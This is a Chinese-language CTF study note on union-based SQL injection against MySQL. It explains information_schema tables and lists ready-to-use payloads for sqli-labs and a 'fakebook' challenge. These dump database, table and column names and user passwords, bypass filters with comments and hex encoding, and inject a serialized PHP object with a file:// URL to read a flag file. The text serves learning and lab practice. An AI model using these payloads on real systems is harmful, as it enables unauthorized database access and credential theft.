CTF-WEB总结之SQL注入

简介

SQL注入漏洞的原理是由于开发者在编写操作数据库代码时，直接将外部可控的参数拼接到SQL语句中，没有经过任何过滤或过滤不严谨，导致攻击者可以使恶意语句在数据库引擎中执行。
Union注入


利用内置函数爆数据库信息及相关信息
version()
database()
user()
current_user()
@@datadir数据库路径
@@basedir mysql安装路径
@@version_compile_os操作系统

mysql>5.0版本会有information_schema ，确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权 限等。在INFORMATION_SCHEMA中，有数个只读表。它们实际上是视图，而不是基本表，因此，你将无法看到与之相关的任何文件。
information_schema数据库表说明:

SCHEMATA表：提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。

TABLES表：提供了关于数据库中的表的信息（包括视图）。详细表述了某个表属于哪个schema，表类型，表引擎，创建时间等信息。是show tables from schemaname的结果取之此表。

COLUMNS表：提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。

STATISTICS表：提供了关于表索引的信息。是show index from schemaname.tablename的结果取之此表。

USER_PRIVILEGES（用户权限）表：给出了关于全程权限的信息。该信息源自mysql.user授权表。是非标准表。

SCHEMA_PRIVILEGES（方案权限）表：给出了关于方案（数据库）权限的信息。该信息来自mysql.db授权表。是非标准表。

TABLE_PRIVILEGES（表权限）表：给出了关于表权限的信息。该信息源自mysql.tables_priv授权表。是非标准表。

COLUMN_PRIVILEGES（列权限）表：给出了关于列权限的信息。该信息源自mysql.columns_priv授权表。是非标准表。

CHARACTER_SETS（字符集）表：提供了mysql实例可用字符集的信息。是SHOW CHARACTER SET结果集取之此表。

COLLATIONS表：提供了关于各字符集的对照信息。

COLLATION_CHARACTER_SET_APPLICABILITY表：指明了可用于校对的字符集。这些列等效于SHOW COLLATION的前两个显示字段。

TABLE_CONSTRAINTS表：描述了存在约束的表。以及表的约束类型。

KEY_COLUMN_USAGE表：描述了具有约束的键列。

ROUTINES表：提供了关于存储子程序（存储程序和函数）的信息。此时，ROUTINES表不包含自定义函数（UDF）。名为“mysql.proc name”的列指明了对应于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列。

VIEWS表：给出了关于数据库中的视图的信息。需要有show views权限，否则无法查看视图信息。

TRIGGERS表：提供了关于触发程序的信息。必须有super权限才能查看该表
总结一下SQL注入中常用到的表：
information_schema这个库

schemata :保存所有数据库的名字

schema_name ：列名

tables : 保存所有表的名字

table_schema ：数据表所属的数据库名 ,table_name:表名称

columns：保存所有列的名字

column_name 列名

查询数据库中所有的库名 user information_schema ;

select schema_name from schemata ;

查询当前库 select database();

查询当前库的所有的表

http://10.1.2.5:10631/sqli/Less-2/
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema =‘fakebook’ #fakebook是当前数据库名称

查询指定库的所有的表

http://10.1.2.5:10631/sqli/Less-2/
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema =database()

查询指定库某个表的所有列

http://10.1.2.5:10631/sqli/Less-2/
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘cms_article’

查询当前库某个表的所有列

select column_name from infromation_schema.columns where table_schema = database() and table_name = ‘users’

http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = ‘users’

查询当前库某个表的所有数据

http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from security.users

利用informations_schema获取数据库信息

放大一些：

获取数据库表的信息
上一步操作获取的数据库名称为：security，转化为16进制：0x7365637572697479

获取数据库列信息

获取内容

limit2，3表示第2行开始的3列
%23是#的url编码

在url中+就表示空格，有的情况下会过滤空格可使用+代替。有时也使用/**/绕过

SQL注入一般步骤

(这里讲最通用的 mysql>5.0)
获取数据库（非必要，因为前面的database可以获得）and 1=2 union select 1,2,schema_name from information_schema.schemata limit 0（开始的记录，0为第一个开始记录）,1（显示1条
记录） %23
获取表 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema = ‘数据库名字’（最常用的是十六进制表示的数据库,’容易被过滤） limit 0,1 ％23
获取列 and 1=2 union select 1,2,column_name from information_schema.columns where table_schema=0x十六进制数据库 and table_name=0x十六进制表 limit 0,1 %23
获取内容 and 1=2 union select 1,2,concat_ws(char(32,58,32),username,password) from users(表 名) limit 0,1 %23

/view.php?no=-1/**/union/**/select/**/1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()%23

/view.php?no=-1/**/union/**/select/**/1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'%23

O:8:“UserInfo”:3:{s:4:“name”;s:2:“s1”;s:3:“age”;i:12;s:4:“blog”;s:29:“file:///var/www/html/flag.php”;}

/view.php?no=-1/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:2:"s1";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

SQL注入中select 1,2,3…的作用

select语句在指明要查询的内容属性（如select id）后，要加from指明是从哪个数据库表中获得数据，在数据库环境中我们一般会先写一句use xxxdatabase，之后写select from语句直接加当前数据库中的表名就可以了。如果我们没有声明使用哪个数据库，也可以直接写 select xxxx from security.users（假设要从security数据库的users表中获取数据）。而select直接加数字串时，可以不写后面的表名，那么它输出的内容就是我们select后的数字，这时我们写的一串数字就是一个数组（或1个行向量），这时select实际上没有向任何一个数据库查询数据，即查询命令不指向任何数据库的表。返回值就是我们输入的这个数组，这时它是个1行n列的表，表的属性名和值都是我们输入的数组，如下图：

那么这个东西有什么用呢？在SQL注入时，我们可以利用它来进行一个快速测试，在Union注入时，如果我们通过测试已经知道了前面语句的字段数，就可以写入union 注入语句，但存在一个问题，我们虽然可以通过注入获得想要的信息，但这些信息必须能够返回到我们手中，对于网页来说，如何能够让数据回显是至关重要的。例如一个网站的参数传递执行的查询有3个字段，很可能这些字段不是都显示在网页前端的，假如其中的1或2个字段的查询结果是会返回到前端的，那么我们就需要知道这3个字段中哪两个结果会回显，这个过程相当于找到数据库与前端显示的通道。如果我们直接输入查询字段进行查询，语句会非常冗长，而且很可能还需要做很多次测试，这时候我们利用一个简单的select 1,2,3，根据显示在页面上的数字就可以知道哪个数字是这个“通道”，那么我们只需要把这个数字改成我们想查询的内容（如id,password），当数据**成功后，就会在窗口显示我们想要的结果。
这里参考文章https://blog.csdn.net/weixin_44840696/article/details/89166154